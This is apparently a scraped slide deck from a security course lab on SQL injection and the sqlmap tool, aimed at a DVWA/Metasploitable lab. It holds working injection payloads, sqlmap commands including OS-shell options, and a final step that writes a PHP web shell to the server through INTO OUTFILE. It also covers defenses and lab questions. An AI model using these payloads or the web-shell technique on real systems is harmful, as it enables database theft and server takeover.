THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
 
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQ-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxDIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 Database
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management System
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
prashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Professionprashanth updated resume 2024 for Teaching Profession
prashanth updated resume 2024 for Teaching Profession
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Development
 
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
 
Paradigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTAParadigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTA
 

SQL Injection

  • 2. SQL ● Special Programming Language for handling data stored in Relational Database Management Systems (RDBMS) ● Used to insert, display and store information from a website on a server. ● Essential for dynamic websites ● Works on the servers. For example : Apache, MS server etc.
  • 3. SQL Injection ● Detects and exploits database flaws to take control of entire database ● Checks for vulnerabilities in: ○ Forms (Username, Password and other fields of forms) ○ URLs (Data requests sent to servers to fetch or write data) ● Fingerprints the back-end DBMS ● Enumerates or retrieves data of interest such as table dumps, usernames, passwords etc. ● Eventually exploiting the system once useful data is obtained such as - OS takeover, web server takeover, data change etc.
  • 4.
  • 5.
  • 6. SQLMAP - The Tool ● Open source penetration testing tool ● Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers ● Comes with a powerful detection engine, ● Broad range of switches lasting from ○ database fingerprinting, ○ over data fetching from the database, ○ to accessing the underlying file system ○ executing commands on the operating system via out-of-band connections.
  • 7. Utility of Tool ● Attacking vulnerable websites ● Protecting your own websites from exploits [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  • 9.
  • 11. Injectable Parameters Example URL -> http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 We want to check if the id parameter is injectable we will try the following code http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2 The first address returns the same webpage as the original URL [TRUE] The second address returns a page different from the original URL [FALSE] Therefore we know that the id parameter is injectable because the backend database evaluates the appended statement to true, and to false correctly.
  • 12. Automatic Payloads ● Payloads are injected SQL statements used to try and grab data from the web-site ● Example Payload- > http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20DISTINCT% 28IFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%29%20FROM% 20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%206%2C1%29%2C11%2C1%29%29%3E56%20AND%20% 27eHhW%27%3D%27eHhW&Submit=Submit ● Clearly payloads are complicated and hence the process is automated by creating them based on the underlying DBMS, OS and web-server ● These payloads are created and tested to grab information from the underlying database by attempting to gain access to the INFORMATION_SCHEMA ● The INFORMATION_SCHEMA contains information about users, tables and procedures ● If no schema is found, sqlmap has a collection of 5 k table names and column names it can use in brute force.
  • 13. Attack Payloads Normal Page More Data Returned Some data returned
  • 14. Fingerprinting Mechanism - The underlying web-server is detected through HTTP cookies and headers, similar to what we saw in class - The DBMS is fingerprinted through error message parsing, banner parsing and version specific payloads.
  • 15. The Command Executing SQLMap Target URL + SQL Injection python sqlmap.py -u "http://172.16.151.140/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie=" PHPSESSID=18884db21c1ac46083760375da62d10c; security=low" Browser Session ID
  • 16.
  • 18. Boolean Based Blind The command flag: --technique b How does it work: 1. “Blind” is when the results of the SQL injection are not visible to the attacker. 2. “Boolean” means that the injected SQL can either be evaluated to TRUE or FALSE 3. Together-> The web-page is displayed differently based on whether the injected statement evaluates to TRUE or FALSE For example ‘ and 1=2 [FALSE]
  • 19. Error Based Blind The command flag: --technique E How does it work: ● Works only when the web application has been configured to disclose back-end DBMS error messages “Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1” ● Detect the backend DBMS by passing random values to the id parameter causing it to throw an error “http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1”
  • 20. Time Based Blind The command flag: --technique t How does it work: 1. 2. sqlmap replaces or appends to the affected parameter in the HTTP request, a syntactically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds. For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character. For example select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10'
  • 21. Union Attack Technique The command flag: --technique u How does it work: 1. Using the boolean-based attack and error based attacked to guess the database type and # of column and column type 2. Using the Union keyword to execute the command to obtain the useful information. For example ‘ and 1=2 Union select password from users
  • 22. Stacked Query Attack 1. Allow to use the “;” in the sql injection command to execute command. 2. It is always used to upload a file when conducting sql-injection. NB: MySQL-PHP are widely use but stacked query is not allowed by default to security reason
  • 24. User, Password and Table Enumeration The command: --dbs --all, --dbs --users, --dbs --current-user How to execute the arbitrary command: ● ● After successfully attacking the database, sqlmap will output all the information about the available users, passwords, tables, columns and much more Dictionary based attack can be used to crack the passwords.
  • 25. Execute Arbitrary Commands The command: --sql-shell How to execute the arbitrary command: After successfully attacking the database,there will be a sql-shell command line to tell you to execute sql command; The Example Output screenshot as follows:
  • 26. Execute Arbitrary Commands (Cont..) The example of executing command: select * from users How it works: Once the username and password are known for a DB user, then we can remotely connect to the DB and run SQL
  • 27. OS Takeover ● Run commands on the underlying operating system of the server ● Flags ○ --os-shell -> access to a remote shell ○ --os-cmd -> run a command on the server ● Example ● Works by SQLmap uploading a binary executable containing two user defined functions --os-cmd pwd sys_eval() and sys_exec() to the the database and then running them to access the database.
  • 28. How to Defend SQL Injection Attack 1. Comprehensive data sanitization. We have to limit the data type of user input data for different web application. For example, if we develop an application for phone number, then the only data type is int and the value is (0~9). 2. Use a web application firewall. There existing a popular and open source module ModSecurity. This module is available for the three most popular web servers,like,Apache Microsoft IIS and nginx. Except this feature, it also provides a complicated and ever-evolving set of rules to protect the web servers from being attacked. 3. Limit database privileges by context. Taking an example, if we have admin user, normal working user and other group user. We need to differ the credential tables into 3 levels. Hence even the attackers successfully attacks the table. And only low credential tables will be shown. 4. Avoid constructing SQL queries with user input. Using prepared SQL statements or procedures to deal with user inquiry will enhance the safety of a database.
  • 29. References Reference link: https://github.com/sqlmapproject/sqlmap Homepage: http://sqlmap.org Download: .tar.gz or .zip Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom Issue tracker: https://github.com/sqlmapproject/sqlmap/issues User's manual: https://github.com/sqlmapproject/sqlmap/wiki Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ Twitter: @sqlmap Demos: #1 and #2 Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots http://www.esecurityplanet.com/hackers/how-to-prevent-sql-injection-attacks.html
  • 30. Lab Questions 1.How is time-based sql injection different from other types of SQL injection? 2. What Changes would you make to the DVWA system to prevent this type of attacks?
  • 31. Answers 1. There is no big difference between “regular” boolean attack and time-based boolean attack. The “Normal” blind attack is based on the difference between the returned values. If there is no difference in the returned value then the time-based attack will be used. 2. Sanitize input, limit database privileges, avoid using direct user input to form DB queries.
  • 32. 3) In this part we will gain access to a shell in the browser without the use of SQLmap 3.1) Navigate to [metasploitable IP] /dvwa/vulnerabilities/sqli/ using a browser in KALI 3.2) Which PHP statement will allow you to run a command on the underlying OS? <? system($_REQUEST['cmd']);?> 3.3) By submitting things using the submission box find out which parameter is injectable id 3.4) Run the payload ' union select "TEXT",2 INTO OUTFILE '/tmp/im_in.txt'# 3.5) View the contents of the /tmp/im_in.txt file Metasploitable 3.6) Using the 3.4 and 3.2 craft a payload to run commands on metasploitable from the Kali browser union select "<? system($_REQUEST['cmd']);?>",2 INTO OUTFILE '/var/www/test/execcmp. php'#